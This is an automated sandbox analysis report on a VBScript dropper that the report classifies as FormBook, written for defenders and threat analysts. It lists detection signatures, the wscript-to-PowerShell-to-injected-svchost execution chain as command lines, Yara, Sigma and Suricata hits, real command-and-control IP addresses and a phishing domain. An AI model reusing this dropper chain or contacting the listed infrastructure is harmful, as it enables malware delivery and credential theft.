Edit tour

Windows Analysis Report
doc00250120.Vbs.vbs

Overview

General Information

Sample name:	doc00250120.Vbs.vbs
Analysis ID:	1595208
MD5:	f5c7c5cb05e8d4caf3e74fda95a2d8d1
SHA1:	3d2ff29b17cbbdd283f9aa2e423bb7ddc7779db7
SHA256:	58e26b83984e7c8783d568a918c5aa3c9f4e7d42210f1731e7dface4a8694498
Tags:	vbsuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Powershell drops PE file

Queues an APC in another process (thread injection)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Script Initiated Connection

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7636 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 7820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 7964 cmdline: "C:\Users\user~1\AppData\Local\Temp\x.exe" MD5: 3F5C9BE44310FD08FF61E1475CBECE41)

svchost.exe (PID: 7980 cmdline: "C:\Users\user~1\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

qVTSNa7tUPbuzPK.exe (PID: 5740 cmdline: "C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\fbPCWOVy.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

sxstrace.exe (PID: 8172 cmdline: "C:\Windows\SysWOW64\sxstrace.exe" MD5: 209969CD31095C47FFB25959B10917F3)

qVTSNa7tUPbuzPK.exe (PID: 5480 cmdline: "C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\Nvryp2OCwgs.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 5604 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2694334630.0000000002F50000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1802111485.0000000004C00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2694722151.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1801343865.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2696950833.0000000005210000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2694604263.0000000004860000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1801650290.00000000039A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2689886267.0000000002980000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: powershell.exe PID: 7820	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x16592:$b1: ::WriteAllBytes( 0x598d6b:$b1: ::WriteAllBytes( 0x165ae:$b2: ::FromBase64String( 0x598d87:$b2: ::FromBase64String( 0x30646:$s1: -join 0x3d8c7:$s1: -join 0x40d89:$s1: -join 0x41423:$s1: -join 0x42f1f:$s1: -join 0x45173:$s1: -join 0x4599a:$s1: -join 0x461f5:$s1: -join 0x46930:$s1: -join 0x46962:$s1: -join 0x469aa:$s1: -join 0x469c9:$s1: -join 0x4721a:$s1: -join 0x47396:$s1: -join 0x4740e:$s1: -join 0x474a1:$s1: -join 0x47707:$s1: -join
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 92.205.22.61, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7636, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49732

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs", ProcessId: 7636, ProcessName: wscript.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 92.205.22.61, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7636, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49732

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7964, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , ProcessId: 7980, ProcessName: svchost.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\x.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\x.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\x.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , ProcessId: 7964, ProcessName: x.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs", ProcessId: 7636, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00250120.Vbs.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7636, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1", ProcessId: 7820, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7964, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , ProcessId: 7980, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T15:25:08.634037+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	217.160.0.207	80	TCP
2025-01-20T15:25:32.795855+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49980	47.83.1.90	80	TCP
2025-01-20T15:25:46.356318+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49984	67.223.117.189	80	TCP
2025-01-20T15:26:00.071369+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49988	72.14.178.174	80	TCP
2025-01-20T15:26:13.439548+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49992	38.180.49.167	80	TCP

ET MALWARE Windows executable base64 encoded

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T15:24:17.018888+0100	2018856	1	A Network Trojan was detected	92.205.22.61	443	192.168.2.7	49732	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-20T15:25:25.157490+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49977	47.83.1.90	80	TCP
2025-01-20T15:25:27.669606+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49978	47.83.1.90	80	TCP
2025-01-20T15:25:30.315515+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49979	47.83.1.90	80	TCP
2025-01-20T15:25:38.458171+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49981	67.223.117.189	80	TCP
2025-01-20T15:25:41.050420+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49982	67.223.117.189	80	TCP
2025-01-20T15:25:43.791794+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49983	67.223.117.189	80	TCP
2025-01-20T15:25:52.333262+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49985	72.14.178.174	80	TCP
2025-01-20T15:25:54.917946+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49986	72.14.178.174	80	TCP
2025-01-20T15:25:57.521931+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49987	72.14.178.174	80	TCP
2025-01-20T15:26:05.790395+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49989	38.180.49.167	80	TCP
2025-01-20T15:26:08.334945+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49990	38.180.49.167	80	TCP
2025-01-20T15:26:10.903166+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49991	38.180.49.167	80	TCP
2025-01-20T15:26:19.328060+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49993	68.65.122.71	80	TCP
2025-01-20T15:26:22.691596+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49994	68.65.122.71	80	TCP
2025-01-20T15:26:26.034536+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49995	68.65.122.71	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://www.atc-secure.com/exl04d3ra	Avira URL Cloud: Label: phishing
Source: https://www.atc-secure.com/exl04d3ry	Avira URL Cloud: Label: phishing
Source: https://www.atc-secure.com/exl04d3r	Avira URL Cloud: Label: phishing
Source: https://www.atc-secure.com/exl04d3rI	Avira URL Cloud: Label: phishing
Source: https://www.atc-secure.com/	Avira URL Cloud: Label: phishing

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2694334630.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1802111485.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2694722151.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1801343865.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2696950833.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2694604263.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1801650290.00000000039A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2689886267.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 92.205.22.61:443 -> 192.168.2.7:49732 version: TLS 1.2

Source:	Binary string: sxstrace.pdb source: svchost.exe, 00000006.00000003.1767543881.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1767496215.000000000341A000.00000004.00000020.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 00000008.00000002.2690309856.00000000007DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sxstrace.pdbGCTL source: svchost.exe, 00000006.00000003.1767543881.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1767496215.000000000341A000.00000004.00000020.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 00000008.00000002.2690309856.00000000007DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: x.exe, 00000005.00000003.1485789551.0000000003610000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1475837691.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1702237590.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1704213775.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1801692455.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1801692455.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1804401295.000000000491E000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2695172752.0000000004C6E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2695172752.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1801652812.000000000476C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: x.exe, 00000005.00000003.1485789551.0000000003610000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1475837691.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000003.1702237590.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1704213775.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1801692455.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1801692455.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1804401295.000000000491E000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2695172752.0000000004C6E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2695172752.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1801652812.000000000476C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sxstrace.exe, 00000009.00000002.2696147303.00000000050FC000.00000004.10000000.00040000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2690176062.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000000.1876966284.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2100834106.000000001CEAC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sxstrace.exe, 00000009.00000002.2696147303.00000000050FC000.00000004.10000000.00040000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2690176062.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000000.1876966284.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2100834106.000000001CEAC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qVTSNa7tUPbuzPK.exe, 00000008.00000000.1721160648.0000000000D9F000.00000002.00000001.01000000.0000000A.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000000.1876514264.0000000000D9F000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00E8445A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8C6D1 FindFirstFileW,FindClose,	5_2_00E8C6D1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_00E8C75C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00E8EF95
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00E8F0F2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	5_2_00E8F3F3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00E837EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00E83B12
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	5_2_00E8BCBC

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 72.14.178.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 67.223.117.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49988 -> 72.14.178.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49976 -> 217.160.0.207:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49984 -> 67.223.117.189:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49992 -> 38.180.49.167:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 38.180.49.167:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49980 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49981 -> 67.223.117.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 67.223.117.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 72.14.178.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 38.180.49.167:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 38.180.49.167:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 72.14.178.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 92.205.22.61:443 -> 192.168.2.7:49732

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 92.205.22.61 443

Jump to behavior

Source: Joe Sandbox View	IP Address: 67.223.117.189 67.223.117.189
Source: Joe Sandbox View	IP Address: 47.83.1.90 47.83.1.90

Source: Joe Sandbox View	ASN Name: VIMRO-AS15189US VIMRO-AS15189US
Source: Joe Sandbox View	ASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

